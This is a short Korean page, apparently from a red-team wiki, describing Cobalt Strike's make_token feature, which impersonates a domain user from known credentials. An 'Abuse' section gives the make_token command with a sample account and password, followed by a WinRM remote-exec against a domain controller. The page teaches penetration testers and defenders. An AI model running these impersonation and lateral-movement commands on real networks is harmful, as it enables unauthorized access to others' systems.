Make Token

코발트 스트라이크에서 사용 가능한 make_token 명령은 사용자가 프로세스를 실행 중인 경우가 아니라도 해당 사용자의 계정 정보(아이디/패스워드)를 알고 있다면 토큰을 생성하여 가장할 수 있는 기능입니다.

Abuse

Cobalt Strike
# 사용자 계정 정보를 통한 토큰 생성
make_token contoso\Mick3y Password123!

# 명령 실행
remote-exec winrm ad01.contoso.com whoami
PreviousToken ImpersonationNextProcess Injection

Last updated

Was this helpful?